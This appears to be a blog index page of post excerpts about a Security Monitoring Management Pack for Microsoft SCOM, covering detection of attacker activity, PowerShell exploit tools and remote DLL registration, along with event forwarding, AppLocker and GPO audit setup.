SCOM Security Monitoring in Action: Detecting an Attacker

This is a fun little story today, but I got to see first hand how our security management pack works during a real, non-simulated attack.  I was pleasantly surprised by the results.  For the record I keep a couple of labs.  One is internal, blocked from the world, and I spend most of my time…

0

Using SCOM to Capture Registering Remotely Located DLL Files

  I’ve started browsing some sites that are cataloguing known attack vectors and came across this particular vulnerability that is worth discussing.  Many seasoned IT pros understand the use of RegSvr32 to register DLL files.  This executable is very integral to Windows as registers DLLs for OS and application use.  A little known flaw is…

0

Security Monitoring MP: Powershell Exploit Toolkit Rules

  In this post we will discuss using SCOM to detect various PowerShell Exploits that are commercially available for download and use.  I’d note that there are limits to this type of detection activity. First, it is worth noting that good attackers don’t use commercially off the shelf attack tools but instead recompile them to…

0

Security Monitoring MP AppLocker Rules

  I’ll be honest in that these are included because they are easy to do, but in reality, they do not provide much in terms of protection. Traditional anti-virus works to detect many of these tools, and while an attacker can corrupt AV pretty easily, it’s also just as easy to recompile these tools so…

0

Security Monitoring Management Pack Summary

I’m rewriting the main page for the Security Monitoring MP to be a bit less cluttered.  I will be using this space to document this management pack with a simple link off from there.  I’ll also use this space to document the change log.  As a reminder, this is more than just an import and…

0

Post Configuration Tasks for the Security Monitoring Management Pack

  As I have mentioned in the initial posts, using the security monitoring management pack is going to require certain practices in procedures be in place.  Simply importing the management pack will not give you a picture of everything that it is designed to monitor.  Ultimately, this management pack serves two purposes.  The first is…

0

Potential Areas for Noise in the Security Monitoring Management Pack

I stated that a main purpose of this management pack is to keep noise volume to a minimum.  As such, the bulk of the rules in place that will catch normal business activity are disabled.  That said, testing has revealed some alerts that will generate in certain circumstances.  For various reasons, it was decided to…

0

Event Forwarding and How to Configure it For the Security Monitoring Management Pack

  One of the features that was built into the Security Monitoring Management Pack was the ability to discover and then monitor the contents of the Forwarded Events logs for suspicious activity.  The reality for most external attacks is that the breach usually occurs at the user tier through some sort of phishing attack.  Attackers…

0

Security Monitoring Management Pack GPO Summary

  If you’ve been reading my blog, you’ll note that in order to use SCOM for security monitoring, you’ll need to ensure that certain AD auditing policies are configured.  I’m using this page as a landing page to the GPO requirements for this security monitoring MP, as some of this is not turned on by…

0

Introducing the Security Monitoring Management Pack for SCOM

  For those of you who haven’t met me or visited my blog, I’ve worked in SCOM now for the better part of 5 years.  I’ve also done a lot of work in IT Security.  About a year and a half ago, I was able to attend a training class about the anatomy of a…

2